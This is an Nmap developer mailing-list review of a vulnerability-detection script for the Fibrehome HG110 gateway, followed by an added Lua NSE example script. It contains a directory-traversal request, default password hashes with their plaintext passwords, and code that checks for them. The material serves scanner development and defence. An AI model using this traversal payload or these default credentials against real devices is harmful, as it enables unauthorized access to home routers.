Re: [NSE] Vulnerabilities in Fibrehome HG110
From: David Fifield <david () bamsoftware com>
Date: Wed, 31 Jul 2013 19:23:32 -0700
On Mon, Jul 08, 2013 at 06:44:24AM -0500, Tom Sellers wrote:
> On April 8th, 2011 Zerial ( fernando () zerial org ) published
> details of local file inclusion and directory traversal
> vulnerabilities in the Fibrehome HG110 wireless gateway. The
> documentation below expands upon his findings and provides a technical
> writeup of the impacts and vectors of these vulnerabilities. The
> attached script serves to provide concrete results from the
>
> Summary: Authentication bypass and complete remote compromise via
> HTTPS management interface in the default configuration of the
> FiberHome residential wireless gateway.
>
> If the attached script is suitable for inclusion I will rename and commit it.
Thanks, Tom, this looks like a good one.
Is this a typo ("Hareware")?
local _, _, hardware_ver = string.find(resp.body,"var G_HarewareVersion[%s]+= \"([^\"]+)\";")
The script should fail faster if one of its first requests doesn't work.
That is, if "/cgi-bin/webproc?getpage=../../../proc/version&var:menu=advanced&var:page=null"
doesn't work, it shouldn't continue on to try all the other tests.
The script should also not output anything if it didn't find any
information. Currently it's outputting some whitespace or something:
PORT STATE SERVICE
8080/tcp open http-proxy
if hash == '$1$TW$yS.Dzi9LPS3wn0qUQMBEA1' then
hash = hash .. " ( password is support )"
creds_service:add(user, 'support', creds.State.VALID )
elseif hash == '$1$TW$dMolyCCNuy2WxyLJ.zUWv0' then
hash = hash .. " ( password is Need4$MVS.cl )"
creds_service:add(user, 'Need4$MVS.cl', creds.State.VALID )
elseif hash == '$1$TW$FxpXryiZeHo/n5Ad15bYI.' then
hash = hash .. " ( password is M0V15tar$$ )"
creds_service:add(user, 'M0V15tar$$', creds.State.VALID )
You should refactor this to use a hash→password table so as to reduce
Sent through the dev mailing list
Archived at http://seclists.org/nmap-dev/
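The three review points above (fail fast if the first probe does not work, print nothing when nothing was found, and replace the if/elseif chain with a hash→password table) in one NSE-style script, as an added example written for this archive page; it is not Tom's attached script and is not part of Nmap. It assumes the NSE http, creds, shortport and stdnse libraries; the three hashes, their default passwords and the /proc/version probe path are the ones quoted in the thread, while the path the script reads the password hashes from is not given in the thread and is left as a labelled placeholder.

```lua
-- Added example, not the script under review. Demonstrates a table-driven
-- default-credential check that fails fast and stays silent when nothing
-- is found. Assumes the NSE libraries below; see the placeholder for the
-- one path the thread does not give.
local http      = require "http"
local creds     = require "creds"
local shortport = require "shortport"
local stdnse    = require "stdnse"
local string    = require "string"
local table     = require "table"

description = [[
Reports whether a gateway exposes its password file through the traversal
described in the thread and whether any account still uses a factory
default password (recognised by its md5crypt hash).
]]
author = "example only"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}

portrule = shortport.http

-- Known hashes of the factory default accounts, as quoted in the thread.
-- Keyed by hash: adding a fourth default is one table entry, not a new branch.
local KNOWN_HASHES = {
  ["$1$TW$yS.Dzi9LPS3wn0qUQMBEA1"] = "support",
  ["$1$TW$dMolyCCNuy2WxyLJ.zUWv0"] = "Need4$MVS.cl",
  ["$1$TW$FxpXryiZeHo/n5Ad15bYI."] = "M0V15tar$$",
}

-- First probe from the thread; if this does not come back, nothing else will.
local VERSION_PROBE = "/cgi-bin/webproc?getpage=../../../proc/version&var:menu=advanced&var:page=null"

-- PLACEHOLDER: the thread does not say which file the hashes are read from.
local PASSWD_PROBE = "/cgi-bin/webproc?getpage=PATH_NOT_GIVEN_IN_THREAD&var:menu=advanced&var:page=null"

-- Pure function, so it can be exercised without a device: scans a
-- passwd/shadow-style body for "user:$1$...:" entries, reports the ones
-- whose hash is a known default, and records them in creds if a store is given.
local function match_default_hashes(body, creds_service)
  local output = {}
  for user, hash in string.gmatch(body, "([^:\n]+):(%$1%$[^:\n]+)") do
    local password = KNOWN_HASHES[hash]
    if password then
      output[#output + 1] = string.format("%s: %s ( password is %s )", user, hash, password)
      if creds_service then
        creds_service:add(user, password, creds.State.VALID)
      end
    end
  end
  return output
end

action = function(host, port)
  -- Fail fast: a missing or empty response to the first probe means the
  -- traversal does not work here, so stop instead of running every test.
  local resp = http.get(host, port, VERSION_PROBE)
  if not resp or resp.status ~= 200 or not resp.body or #resp.body == 0 then
    return nil
  end

  local passwd = http.get(host, port, PASSWD_PROBE)
  if not passwd or passwd.status ~= 200 or not passwd.body then
    return nil
  end

  local creds_service = creds.Credentials:new(SCRIPT_NAME, host, port)
  local findings = match_default_hashes(passwd.body, creds_service)

  -- Nothing recognised: return nil so Nmap prints no script output at all,
  -- rather than a stray blank line.
  if #findings == 0 then
    return nil
  end
  return stdnse.format_output(true, findings)
end
```

match_default_hashes is kept separate from action so the table lookup can be checked against a constructed body (for example "support:$1$TW$yS.Dzi9LPS3wn0qUQMBEA1:0:0::/:/bin/sh") with plain lua, without a gateway on the wire; action only decides whether to stop early and whether there is anything worth printing.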